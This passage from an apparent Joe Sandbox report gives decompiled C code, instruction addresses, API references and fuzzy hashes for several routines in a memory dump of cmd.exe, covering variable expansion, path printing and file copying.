						_t73 =  *(_t78 + _t79) & 0x0000ffff;
						if(_t73 == 0) {
							break;
						} else {
							 *_t79 = _t73;
							_t79 = _t79 + 2;
							_t102 = _t102 - 1;
							if(_t102 != 0) {
								continue;
							} else {
								L37:
								_t80 = _t79 - 2;
							}
						}
						goto L7;
					}
					__eflags = _t102;
					if(_t102 == 0) {
						goto L37;
					}
				}
				L7:
				_t75 = 0;
				 *_t80 = 0;
				_t81 = _t104;
				_v12 = 0;
				_t38 =  *_t104 & 0x0000ffff;
				if(_t38 == 0) {
					L13:
					 *0x1eb8a4 = 0x1e3892;
					 *_t113 = 0;
					if(_t75 > 0x2001) {
						__eflags = 0;
						 *0x1e3892 = 0;
						goto L40;
					} else {
						return E001C0040(_t81);
					}
				} else {
					while(1) {
						_t83 = _t104;
						_t104 = _t104 + 2;
						_v16 = _t83;
						if(_t75 > 0x2001) {
							break;
						}
						if(_t38 == 0x25) {
							_t93 =  *0x1f3cc4;
							__eflags = _t93;
							if(__eflags == 0) {
								L19:
								_t81 = E001B8F70(0x1eb8f8, _t104, __eflags,  &_v12, 0x25);
								__eflags = _t81;
								if(_t81 == 0) {
									__eflags =  *0x1f3cc4;
									_t113 =  *0x1eb8a4;
									if( *0x1f3cc4 == 0) {
										goto L33;
									} else {
										_t104 = _v16 + (_v12 + 1) * 2;
									}
									goto L11;
								} else {
									goto L20;
								}
							} else {
								_t54 =  *_t104 & 0x0000ffff;
								__eflags = _t54 - 0x25;
								if(_t54 == 0x25) {
									_t29 = _t83 + 4; // 0x4
									_t104 = _t29;
									L33:
									 *_t113 = 0x25;
									_t113 = _t113 + 2;
									_t75 = _t75 + 1;
									goto L24;
								} else {
									__eflags = _t54 - 0x2a;
									if(_t54 == 0x2a) {
										__eflags =  *0x1f3cc9;
										if( *0x1f3cc9 == 0) {
											goto L18;
										} else {
											_t99 =  *(_t93 + 0x34);
											_t18 = _t83 + 4; // 0x4
											_t104 = _t18;
											__eflags = _t99;
											if(_t99 == 0) {
												goto L11;
											} else {
												_t89 = _t99;
												_v16 = _t89 + 2;
												do {
													_t59 =  *_t89;
													_t89 = _t89 + 2;
													__eflags = _t59;
												} while (_t59 != 0);
												_t91 = _t89 - _v16 >> 1;
												_v20 = _t91;
												__eflags = _t91;
												if(_t91 <= 0) {
													goto L11;
												} else {
													_t60 = _t91 + _t75;
													_v16 = _t60;
													__eflags = _t60 - 0x2000;
													if(_t60 > 0x2000) {
														memcpy(_t113, _t99, 0x2000 - _t75 + 0x2000 - _t75);
														 *0x1e7892 = 0;
														E001BC5A2(_t91, 0x234f, 1, 0x1e3892);
														goto L41;
													} else {
														E001C1040(_t113, 0x2003 - (_t113 - 0x1e3890 >> 1), _t99);
														_t75 = _v16;
														_t113 = _t113 + _v20 * 2;
														 *0x1eb8a4 = _t113;
														goto L11;
													}
												}
											}
										}
									} else {
										L18:
										_t81 = E001C1969(0x1eb8f8, _t104,  &_v12, L"0123456789", _t93 + 0x3c);
										__eflags = _t81;
										if(__eflags != 0) {
											L20:
											_t108 = _t81;
											_t10 = _t108 + 2; // 0x2
											_t95 = _t10;
											do {
												_t49 =  *_t108;
												_t108 = _t108 + 2;
												__eflags = _t49;
											} while (_t49 != 0);
											_t110 = _t108 - _t95 >> 1;
											_t75 = _t75 + _t110;
											__eflags = _t75 - 0x2001;
											if(_t75 > 0x2001) {
												L40:
												_push(0);
												_push(0x233f);
												E001BC5A2(_t81);
												L41:
												_t82 = _v8;
												E001C0040(_v8);
												__imp__longjmp(0x1eb8f8, 0xffffffff);
												asm("int3");
												_push(0);
												_push(8);
												E001BC5A2(_t82);
												__eflags = 0;
												return 0;
											} else {
												_t116 =  *0x1eb8a4;
												E001C1040(_t116, 0x2003 - (_t116 - 0x1e3890 >> 1), _t81);
												_t113 = _t116 + _t110 * 2;
												_t112 = _v12 + 1;
												__eflags = _t112;
												_t104 = _v16 + _t112 * 2;
												L24:
												 *0x1eb8a4 = _t113;
												goto L11;
											}
										} else {
											goto L19;
										}
									}
								}
							}
						} else {
							 *_t113 = _t38;
							_t75 = _t75 + 1;
							_t113 = _t113 + 2;
							 *0x1eb8a4 = _t113;
							if(_t38 == 0xa) {
								break;
							} else {
								L11:
								_t38 =  *_t104 & 0x0000ffff;
								if(_t38 != 0) {
									continue;
								} else {
									break;
								}
							}
						}
						goto L43;
					}
					_t81 = _v8;
					goto L13;
				}
				L43:
			}

0x001bfe15
0x001bfe19
0x001bfe1b
0x001bfe20
0x001bfe25
0x001bfe28
0x001bfe2c
0x001cc954
0x001cc959
0x001cc95c
0x001cc96d
0x00000000
0x001bfe32
0x001bfe32
0x001bfe38
0x001bfe3f
0x001bfe41
0x001bfe43
0x001bfe43
0x001bfe4b
0x00000000
0x00000000
0x001bfe4d
0x001bfe54
0x00000000
0x001bfe56
0x001bfe56
0x001bfe59
0x001bfe5c
0x001bfe5f
0x00000000
0x001bfe61
0x001cc973
0x001cc973
0x001cc973
0x001bfe5f
0x00000000
0x001bfe54
0x001bfe66
0x001bfe68
0x00000000
0x00000000
0x001bfe68
0x001bfe6e
0x001bfe70
0x001bfe72
0x001bfe75
0x001bfe77
0x001bfe7a
0x001bfe80
0x001bfeb6
0x001bfeb8
0x001bfec2
0x001bfecb
0x001cc9ad
0x001cc9af
0x00000000
0x001bfed1
0x001bfedc
0x001bfedc
0x001bfe82
0x001bfe82
0x001bfe82
0x001bfe84
0x001bfe87
0x001bfe90
0x00000000
0x00000000
0x001bfe96
0x001bfedd
0x001bfee3
0x001bfee5
0x001bff1b
0x001bff2d
0x001bff2f
0x001bff31
0x001c0022
0x001c0029
0x001c002f
0x00000000
0x001c0031
0x001c0038
0x001c0038
0x00000000
0x00000000
0x00000000
0x00000000
0x001bfee7
0x001bfee7
0x001bfeea
0x001bfeed
0x001c000e
0x001c000e
0x001c0011
0x001c0016
0x001c0019
0x001c001c
0x00000000
0x001bfef3
0x001bfef3
0x001bfef6
0x001bff93
0x001bff9a
0x00000000
0x001bffa0
0x001bffa0
0x001bffa3
0x001bffa3
0x001bffa6
0x001bffa8
0x00000000
0x001bffae
0x001bffae
0x001bffb3
0x001bffb6
0x001bffb6
0x001bffb9
0x001bffbc
0x001bffbc
0x001bffc4
0x001bffc6
0x001bffc9
0x001bffcb
0x00000000
0x001bffd1
0x001bffd1
0x001bffd4
0x001bffd7
0x001bffdc
0x001cc987
0x001cc991
0x001cc9a3
0x00000000
0x001bffe2
0x001bfff5
0x001bfffd
0x001c0000
0x001c0003
0x00000000
0x001c0003
0x001bffdc
0x001bffcb
0x001bffa8
0x001bfefc
0x001bfefc
0x001bff15
0x001bff17
0x001bff19
0x001bff37
0x001bff37
0x001bff39
0x001bff39
0x001bff40
0x001bff40
0x001bff43
0x001bff46
0x001bff46
0x001bff4d
0x001bff4f
0x001bff51
0x001bff57
0x001cc9b5
0x001cc9b5
0x001cc9b7
0x001cc9bc
0x001cc9c4
0x001cc9c4
0x001cc9c7
0x001cc9d3
0x001cc9d9
0x001cc9da
0x001cc9dc
0x001cc9de
0x001cc9e6
0x001cc9e9
0x001bff5d
0x001bff5d
0x001bff76
0x001bff7e
0x001bff84
0x001bff84
0x001bff85
0x001bff88
0x001bff88
0x00000000
0x001bff88
0x00000000
0x00000000
0x00000000
0x001bff19
0x001bfef6
0x001bfeed
0x001bfe98
0x001bfe98
0x001bfe9b
0x001bfe9c
0x001bfe9f
0x001bfea9
0x00000000
0x001bfeab
0x001bfeab
0x001bfeab
0x001bfeb1
0x00000000
0x00000000
0x00000000
0x00000000
0x001bfeb1
0x001bfea9
0x00000000
0x001bfe96
0x001bfeb3
0x00000000
0x001bfeb3
0x00000000

APIs

Part of subcall function 001C00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000), ref: 001C00C1
Part of subcall function 001C00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000,?), ref: 001C00C8

memset.MSVCRT ref: 001CC954
longjmp.MSVCRT(001EB8F8,000000FF,00000000,001E3892,001E3890,?,?,?,?,001BFD5C,?,?,?,001C837D,00000000), ref: 001CC96D
memcpy.MSVCRT ref: 001CC987
longjmp.MSVCRT(001EB8F8,000000FF,001E3892,001E3890,?,?,?,?,001BFD5C,?,?,?,001C837D,00000000), ref: 001CC9D3

Strings

0123456789, xrefs: 001BFF05

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heaplongjmp$AllocProcessmemcpymemset
String ID: 0123456789
API String ID: 2034586978-2793719750
Opcode ID: 294b1ea5890cc6ec0171551c3d29766cea827b71ab5a0064d621ad0f88216698
Instruction ID: 8916221b299dc6d45729cf422750fe6d1a5fc6dfea1fccebfe8e3661d2824028
Opcode Fuzzy Hash: 294b1ea5890cc6ec0171551c3d29766cea827b71ab5a0064d621ad0f88216698
Instruction Fuzzy Hash: 46712535A002459BDB249F69CD85BBE73A5EF94304F19407DE819AB7A5EB30DE82C780

Uniqueness

Uniqueness Score: -1.00%

Function 001C6390 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E001C6390(void* __ecx, long __edx) {
				intOrPtr _v8;
				signed int _v16;
				long _v28;
				char _v32;
				void* _v36;
				void _v556;
				signed int _v560;
				signed short* _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t35;
				intOrPtr _t47;
				void* _t54;
				void* _t61;
				signed int _t64;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t78;
				signed int _t83;
				signed short* _t92;
				void* _t97;
				signed int _t100;
				intOrPtr _t102;
				void* _t103;
				signed int _t104;
				signed short* _t106;
				int _t108;
				void* _t109;
				signed int _t110;
				signed int _t115;

				_t95 = __edx;
				_t71 = _t115;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t71 + 4));
				_t113 = (_t115 & 0xfffffff8) + 4;
				_t35 =  *0x1dd0b4; // 0xea614d48
				_v16 = _t35 ^ (_t115 & 0xfffffff8) + 0x00000004;
				_t102 =  *((intOrPtr*)(_t71 + 8));
				_t108 = 0;
				_v28 = 0x104;
				_v36 = 0;
				_v32 = 1;
				memset( &_v556, 0, 0x104);
				if(E001C0C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t47 = 1;
					L32:
					_t108 = _t47;
					L10:
					__imp__??_V@YAXPAX@Z(_v36);
					_pop(_t103);
					_pop(_t109);
					return E001C6FD0(_t108, _t71, _v16 ^ _t113, _t95, _t103, _t109);
				}
				_t104 = E001BEA40( *((intOrPtr*)(_t102 + 0x3c)), 0x1b24ac, (0 |  *0x1f3cc9 != 0x00000000) + 2);
				_v560 = _t104;
				if( *0x1f3cc9 == 0) {
					L4:
					_t78 = _t104;
					_t17 = _t78 + 2; // 0x2
					_t97 = _t17;
					do {
						_t54 =  *_t78;
						_t78 = _t78 + 2;
					} while (_t54 != _t108);
					_v560 = _t78 - _t97 >> 1;
					E001C1040(_t104, _v560 + 1, E001C22C0(_t71, _t104));
					_t95 =  *_t104 & 0x0000ffff;
					if(_t95 != 0) {
						_t83 = _t104;
						_t26 = _t83 + 2; // 0x2
						_v560 = _t26;
						do {
							_t58 =  *_t83;
							_t83 = _t83 + 2;
						} while (_t58 != _t108);
						if(_t83 - _v560 >> 1 != 2 ||  *((short*)(_t104 + 2)) != 0x3a || iswalpha(_t95) == 0) {
							_t47 = E001D8371(_t58, _t104);
							 *0x1eb8b0 = _t47;
							goto L32;
						} else {
							_t88 = _v36;
							if(_v36 == 0) {
								_t88 =  &_v556;
							}
							_t95 = _v28;
							E001C36CB(_t71, _t88, _v28,  *_t104 & 0x0000ffff);
							_t61 = _v36;
							if(_t61 == 0) {
								_t61 =  &_v556;
							}
							L9:
							_push(_t61);
							E001C25D9(L"%s\r\n");
							 *0x1eb8b0 = _t108;
							goto L10;
						}
					}
					_t91 =  *0x1f3cb8;
					if( *0x1f3cb8 == 0) {
						_t91 = 0x1f3ab0;
					}
					_t95 =  *0x1f3cc0;
					E001C36CB(_t71, _t91,  *0x1f3cc0, _t108);
					_t61 =  *0x1f3cb8;
					if(_t61 == 0) {
						_t61 = 0x1f3ab0;
					}
					goto L9;
				}
				_t64 =  *_t104 & 0x0000ffff;
				_t92 = _t104;
				_t110 = _t104;
				if(_t64 != 0) {
					_t100 = _t64;
					do {
						 *_t110 = _t100;
						if(_t100 == 0) {
							L17:
							_v564 =  &(_t92[1]);
							while(1) {
								_t23 = _t110 - 2; // -4
								_t106 = _t23;
								if(iswspace( *_t106 & 0x0000ffff) == 0) {
									goto L20;
								}
								_t110 = _t106;
							}
							goto L20;
						} else {
							goto L16;
						}
						do {
							L16:
							_t92 =  &(_t92[1]);
							_t110 = _t110 + 2;
							_t69 =  *_t92 & 0x0000ffff;
							 *_t110 = _t69;
						} while (_t69 != 0);
						goto L17;
						L20:
						_t92 = _v564;
						 *_t110 = 0;
						_t110 = _t110 + 2;
						_t68 =  *_t92 & 0x0000ffff;
						_t100 = _t68;
					} while (_t68 != 0);
					_t104 = _v560;
				}
				 *_t110 = 0;
				_t108 = 0;
				goto L4;
			}

0x001c6390
0x001c6393
0x001c6395
0x001c6396
0x001c63a1
0x001c63a5
0x001c63ad
0x001c63b4
0x001c63b9
0x001c63c2
0x001c63c4
0x001c63cd
0x001c63d2
0x001c63d6
0x001c63ff
0x001cf71c
0x001cf7f0
0x001cf7f0
0x001c64bc
0x001c64bf
0x001c64cb
0x001c64ce
0x001c64da
0x001c64da
0x001c6428
0x001c642a
0x001c6430
0x001c6449
0x001c6449
0x001c644b
0x001c644b
0x001c644e
0x001c644e
0x001c6451
0x001c6454
0x001c645d
0x001c6474
0x001c6479
0x001c647f
0x001cf77f
0x001cf781
0x001cf784
0x001cf78a
0x001cf78a
0x001cf78d
0x001cf790
0x001cf7a0
0x001cf7e6
0x001cf7eb
0x00000000
0x001cf7b5
0x001cf7b5
0x001cf7ba
0x001cf7bc
0x001cf7bc
0x001cf7c5
0x001cf7c9
0x001cf7ce
0x001cf7d3
0x001cf7d9
0x001cf7d9
0x001c64a9
0x001c64a9
0x001c64af
0x001c64b6
0x00000000
0x001c64b6
0x001cf7a0
0x001c6485
0x001c6492
0x001c64dd
0x001c64dd
0x001c6494
0x001c649b
0x001c64a0
0x001c64a7
0x001c64e1
0x001c64e1
0x00000000
0x001c64a7
0x001c6432
0x001c6435
0x001c6437
0x001c643c
0x001cf722
0x001cf724
0x001cf724
0x001cf72a
0x001cf73d
0x001cf740
0x001cf74a
0x001cf74a
0x001cf74a
0x001cf75a
0x00000000
0x00000000
0x001cf748
0x001cf748
0x00000000
0x00000000
0x00000000
0x00000000
0x001cf72c
0x001cf72c
0x001cf72c
0x001cf72f
0x001cf732
0x001cf735
0x001cf738
0x00000000
0x001cf75c
0x001cf75c
0x001cf764
0x001cf767
0x001cf76a
0x001cf76d
0x001cf76f
0x001cf774
0x001cf774
0x001c6444
0x001c6447
0x00000000

APIs

memset.MSVCRT ref: 001C63D6

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEAB7
Part of subcall function 001BEA40: iswspace.MSVCRT ref: 001BEB2D
Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEB49
Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEB6D

??_V@YAXPAX@Z.MSVCRT ref: 001C64BF
iswspace.MSVCRT ref: 001CF751

Strings

%s, xrefs: 001C64AA

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: wcschr$iswspacememset
String ID: %s
API String ID: 2220997661-3043279178
Opcode ID: c10300ffebb80b495d6bfaa64846b1eafbb143bdcf20ecd5b02ee4c5553be7cd
Instruction ID: dd87c10d22b382da429472587842e4092bf6acb948b7dbdb31dad213681465b4
Opcode Fuzzy Hash: c10300ffebb80b495d6bfaa64846b1eafbb143bdcf20ecd5b02ee4c5553be7cd
Instruction Fuzzy Hash: F851C875A002159BDB28DF68D885BBA77F6EF64350F14416EE845D7340EB34DD82C790

Uniqueness

Uniqueness Score: -1.00%

Function 001D85E9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E001D85E9(intOrPtr __ecx, signed int __edx) {
				signed int _v20;
				int _v32;
				char _v36;
				int _v40;
				void _v560;
				int _v568;
				char _v572;
				int _v576;
				void _v1096;
				int _v1104;
				char _v1108;
				int _v1112;
				void* _v1124;
				void _v1632;
				intOrPtr _v1636;
				signed int _v1640;
				int _v1644;
				signed int* _v1648;
				signed int* _v1652;
				signed int _v1656;
				intOrPtr _v1660;
				char _v1664;
				void* _v1668;
				void* _v1672;
				void* _v1676;
				void* _v1680;
				void* _v1684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t196;
				signed int _t198;
				void* _t218;
				void* _t232;
				signed int _t236;
				void* _t237;
				signed int _t239;
				void* _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				signed char _t258;
				intOrPtr _t260;
				void* _t263;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t276;
				signed int _t279;
				void* _t280;
				signed int _t281;
				void* _t282;
				signed int _t290;
				signed int _t291;
				void* _t292;
				signed int _t293;
				signed int _t295;
				void* _t296;
				signed int _t297;
				void* _t298;
				signed int _t299;
				void* _t300;
				void* _t303;
				intOrPtr _t305;
				signed int _t307;
				void* _t316;
				void* _t317;
				signed int _t346;
				void* _t348;
				void* _t352;
				intOrPtr _t354;
				intOrPtr _t356;
				void* _t357;
				WCHAR* _t358;
				signed int _t359;
				signed int _t368;
				intOrPtr _t371;
				signed int _t392;
				signed int _t412;
				void* _t414;
				signed int _t416;
				signed int _t418;
				intOrPtr _t419;
				void* _t420;
				signed int* _t421;
				void* _t422;
				signed int _t426;
				signed int _t428;
				signed int _t431;
				void* _t435;

				_t391 = __edx;
				_t318 = __ecx;
				_t418 = __edx;
				if(__ecx != 0) {
					_push(0);
					_push(__ecx);
					E001BC108(__ecx);
					_pop(_t318);
				}
				if(_t418 == 1) {
					_t418 = 0x1f3d00;
					E001C274C(0x1f3d00, 0x104, L"%9d",  *0x1dd56c);
					E001BC108(_t318, 0x2336, 1, 0x1f3d00);
					_t426 = _t426 + 0x1c;
				}
				 *0x1dd560 =  *0x1f8064 & 0x000000ff;
				while(1) {
					_t196 =  *0x1dd5dc; // 0x0
					_t435 =  *0x1dd568 - _t196; // 0x0
					if(_t435 >= 0) {
						break;
					}
					_t318 =  *((intOrPtr*)( *0x1f3cf4 + _t196 * 4 - 4));
					E001BCD27(_t318);
				}
				__imp__longjmp(0x1eb8f8, 1);
				asm("int3");
				_t428 = (_t426 & 0xfffffff8) - 0x67c;
				_t198 =  *0x1dd0b4; // 0xea614d48
				_v20 = _t198 ^ _t428;
				_push(_t418);
				_push(_t412);
				_v1640 = _t391;
				_t419 = _t318;
				_v1104 = 0x104;
				_v1644 = 0;
				_t316 = 1;
				_v1112 = 0;
				_t413 = _t412 | 0xffffffff;
				_v1108 = 1;
				memset( &_v1632, 0, 0x104);
				_v36 = 1;
				_v32 = 0x104;
				_v40 = 0;
				memset( &_v560, 0, 0x104);
				_v572 = 1;
				_v568 = 0x104;
				_v576 = 0;
				memset( &_v1096, 0, 0x104);
				_t431 = _t428 + 0x24;
				if(E001C0C70( &_v1632, ((0 | _v1108 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E001C0C70( &_v560, ((0 | _v36 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E001C0C70( &_v1096, ((0 | _v572 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L141:
					E001C0DE8(E001C0DE8(E001C0DE8(_t214,  &_v1096),  &_v560),  &_v1632);
					_t218 = _t316;
				} else {
					_t214 = E001B585F(0xfe00,  &_v1648, 0);
					_v1668 = _t214;
					if(_t214 == 0) {
						goto L141;
					} else {
						if( *0x1dd560 == 0) {
							_t232 = _v1648;
							goto L17;
						} else {
							_v1652 = _v1648;
							_t214 = E001B585F(_v1648,  &_v1668, 1);
							_v1652 = _t214;
							if(_t214 != 0) {
								if(_v1648 >= _v1668) {
									_t232 = _v1668;
									L17:
									_v1652 = _t232;
								}
								_t421 =  *(_t419 + 0x20);
								_v1648 = _t421;
								while(1) {
									_t214 = E001BAD44( *_t421);
									if(_t214 != 0) {
										break;
									}
									_t421 = _t421[8];
									_v1648 = _t421;
									if(_t421 != 0) {
										continue;
									} else {
										_t316 = _t214;
										goto L141;
									}
									goto L142;
								}
								_t391 =  *_t421;
								__eflags = 0;
								E001C68BA(E001C6A00,  *_t421, 0x21, 0, _t421[6],  &_v1664);
								while(1) {
									_t421[7] = _t421[7] & 0xffff3fff;
									_t236 = _t421[7];
									__eflags = _t236 & 0x00000004;
									if((_t236 & 0x00000004) != 0) {
										_t307 = _t236 & 0xfffffffb | 0x00000002;
										__eflags = _t307;
										_t421[7] = _t307;
									}
									__eflags =  *0x1dd544;
									if( *0x1dd544 != 0) {
										break;
									}
									_t391 = _v40;
									__eflags = _v40;
									if(_v40 == 0) {
										_t391 =  &_v560;
									}
									_t237 = E001B579C(_t421, _t391, _v32);
									__eflags = _t237 - _t316;
									if(_t237 == _t316) {
										break;
									} else {
										_push(_t421[1]);
										E001C25D9(L"%s\r\n");
										_t239 = _v1112;
										__eflags = _t239;
										if(_t239 == 0) {
											_t239 =  &_v1632;
										}
										_t391 = _v1640;
										_t240 = E001B5226(_t421, _v1640, _t239, _v1104, 0);
										__eflags = _t240 - _t316;
										if(_t240 == _t316) {
											break;
										} else {
											_t392 = _v1112;
											_t241 = _t392;
											__eflags = _t392;
											if(_t392 == 0) {
												_t241 =  &_v1632;
											}
											__eflags =  *_t241;
											if( *_t241 != 0) {
												__eflags = _t392;
												if(_t392 == 0) {
													_t392 =  &_v1632;
												}
												_t244 = E001D8F66(_t421[1], _t392);
												_t346 = _t421[1];
												__eflags = _t244;
												if(_t244 == 0) {
													_t422 = E001B5DB5(_t346, (_t421[7] & 0x00000800) << 0xa, _t346, _t346);
													__eflags = _t422 - 0xffffffff;
													if(_t422 == 0xffffffff) {
														E001BCD27(_v1664);
														L135:
														_t348 = 0x6e;
														E001D985A(_t348);
														L130:
														__eflags = 0;
														E001D85E9(0, _t316);
														L131:
														E001BCD27(_v1664);
														E001BDB92(_t422);
														_t352 = _v1668;
														L129:
														E001BDB92(_t352);
														goto L130;
													}
													_t252 = E001C0178(_t245);
													__eflags = _t252;
													if(_t252 == 0) {
														_t354 = _v1652;
													} else {
														_t354 = 0x80;
														_v1652 = 0x80;
													}
													_t253 = _v1112;
													__eflags = _t253;
													if(_t253 == 0) {
														_t253 =  &_v1632;
													}
													_t415 = _v1648;
													_t255 = E001B5712(_t422, _v1660, _t354,  &_v1656, _v1648, _t413, _t253);
													__eflags =  *0x1f3cf0;
													_v1656 = _t255;
													if( *0x1f3cf0 != 0) {
														_t356 = _v1664;
														L137:
														E001BCD27(_t356);
														_t357 = _t422;
														L134:
														E001BDB92(_t357);
														goto L135;
													}
													_t358 = _v1112;
													__eflags = _t358;
													if(_t358 == 0) {
														_t358 =  &_v1632;
													}
													_t258 = GetFileAttributesW(_t358);
													_t359 = _v1112;
													__eflags = _t258 & 0x00000002;
													if((_t258 & 0x00000002) != 0) {
														__eflags = _t359;
														if(_t359 == 0) {
															_t359 =  &_v1632;
														}
														_t360 = E001B5DB5(_t359, _t316, _t359, _t359);
														_v1680 = _t360;
														_v1676 = _t360;
													} else {
														__eflags = _t359;
														if(__eflags == 0) {
															_t359 =  &_v1632;
														}
														_t303 = E001B43A0(_t359, __eflags);
														_v1672 = _t303;
														_v1668 = _t303;
														__eflags = _t303 - 0xffffffff;
														if(_t303 == 0xffffffff) {
															L136:
															_t356 = _v1664;
															goto L137;
														}
														__imp___get_osfhandle(_t303);
														SetEndOfFile(_t303);
														_t360 = _v1672;
													}
													__eflags = _t360 - 0xffffffff;
													if(_t360 == 0xffffffff) {
														goto L136;
													}
													__eflags =  *0x1dd5cc;
													if( *0x1dd5cc == 0) {
														L69:
														_t260 = _v1636;
														while(1) {
															__eflags = _t260 - _t316;
															if(_t260 != _t316) {
																goto L84;
															}
															_t291 = _v1112;
															__eflags = _t291;
															if(_t291 == 0) {
																_t291 =  &_v1632;
															}
															_t292 = E001D916C(_t360, _v1660, _v1656, _t291, _t422);
															__eflags =  *0x1dd560;
															_t382 = _v1684;
															if( *0x1dd560 != 0) {
																_t295 = E001C0178(_t292);
																__eflags = _t295;
																if(_t295 != 0) {
																	_t382 = _v1672;
																} else {
																	_t408 = _v1112;
																	__eflags = _v1112;
																	if(__eflags == 0) {
																		_t408 =  &_v1632;
																	}
																	_t296 = E001D84FE(_t295, _t408, __eflags, _v1656, _v1660, _v1644);
																	__eflags = _t296 - _t316;
																	if(_t296 == _t316) {
																		goto L131;
																	}
																	_t382 = _v1668;
																	_v1672 = _v1668;
																}
															}
															_t293 = _v1112;
															__eflags = _t293;
															if(_t293 == 0) {
																_t293 =  &_v1632;
															}
															_t260 = E001B5712(_t422, _v1660, _v1652,  &_v1656, _t415, _t382, _t293);
															__eflags =  *0x1dd5cc;
															if( *0x1dd5cc == 0) {
																_t360 = _v1672;
																continue;
															}
															goto L84;
														}
													} else {
														__eflags = _v1656;
														if(_v1656 > 0) {
															_t297 = _v1112;
															__eflags = _t297;
															if(_t297 == 0) {
																_t297 =  &_v1632;
															}
															_t298 = E001D916C(_t360, _v1660, _v1656, _t297, _t422);
															__eflags =  *0x1dd560;
															_t360 = _v1684;
															if( *0x1dd560 != 0) {
																_t299 = E001C0178(_t298);
																__eflags = _t299;
																if(_t299 != 0) {
																	_t360 = _v1672;
																} else {
																	_t410 = _v1112;
																	__eflags = _v1112;
																	if(__eflags == 0) {
																		_t410 =  &_v1632;
																	}
																	_t300 = E001D84FE(_t299, _t410, __eflags, _v1656, _v1660, _v1644);
																	__eflags = _t300 - _t316;
																	if(_t300 == _t316) {
																		E001BCD27(_v1664);
																		E001BDB92(_t422);
																		_t352 = _v1668;
																		goto L129;
																	}
																	_t360 = _v1668;
																	_v1672 = _v1668;
																}
															}
														}
														__eflags =  *0x1dd5cc;
														if( *0x1dd5cc == 0) {
															goto L69;
														}
													}
													L84:
													__eflags = 0;
													 *0x1dd5cc = 0;
													E001BDB92(_t422);
													_t421 = _v1648;
												} else {
													_t305 = E001D8E52(_t421, _v1660, _v1652);
													_v1680 = _t305;
													_v1676 = _t305;
												}
												_t416 = _t421[8];
												_t263 = 0;
												 *0x1dd564 = 0;
												__eflags = _t416;
												if(_t416 != 0) {
													do {
														_t265 =  *(_t416 + 0x1c);
														__eflags = _t265 & 0x00000004;
														if((_t265 & 0x00000004) != 0) {
															_t290 = _t265 & 0xfffffffb | 0x00000002;
															__eflags = _t290;
															 *(_t416 + 0x1c) = _t290;
														}
														_t363 = _v576;
														__eflags = _v576;
														if(_v576 == 0) {
															_t363 =  &_v1096;
														}
														_t266 = E001B5400(_t363, _v568,  *_t416, _t421[1]);
														__eflags = _t266;
														if(_t266 == 0) {
															_t267 = _v576;
															__eflags = _t267;
															if(_t267 == 0) {
																_t267 =  &_v1096;
															}
															_push(_t267);
															E001C25D9(L"%s\r\n");
														} else {
															_push(0);
															_push(_t266);
															E001BC108(0);
														}
														_t366 = _v576;
														__eflags = _v576;
														if(_v576 == 0) {
															_t366 =  &_v1096;
														}
														_t269 = E001BAD44(_t366);
														__eflags = _t269;
														if(_t269 != 0) {
															_t401 = _v1112;
															__eflags = _v1112;
															if(_v1112 == 0) {
																_t401 =  &_v1632;
															}
															_t367 = _v576;
															__eflags = _v576;
															if(_v576 == 0) {
																_t367 =  &_v1096;
															}
															_t270 = E001D8F66(_t367, _t401);
															__eflags = _t270;
															if(_t270 == 0) {
																_t368 = _v576;
																__eflags = _t368;
																if(_t368 == 0) {
																	_t368 =  &_v1096;
																}
																_t422 = E001B5DB5(_t368, 0, _t368, _t368);
																__eflags = _t422 - 0xffffffff;
																if(_t422 == 0xffffffff) {
																	E001BCD27(_v1664);
																	_t357 = _v1672;
																	goto L134;
																}
																_t273 = E001C0178(_t271);
																__eflags = _t273;
																if(_t273 == 0) {
																	L120:
																	_t371 = _v1652;
																} else {
																	_t371 = 0x80;
																	_v1652 = 0x80;
																}
																__eflags =  *0x1dd5cc;
																if( *0x1dd5cc == 0) {
																	_t274 = _v1112;
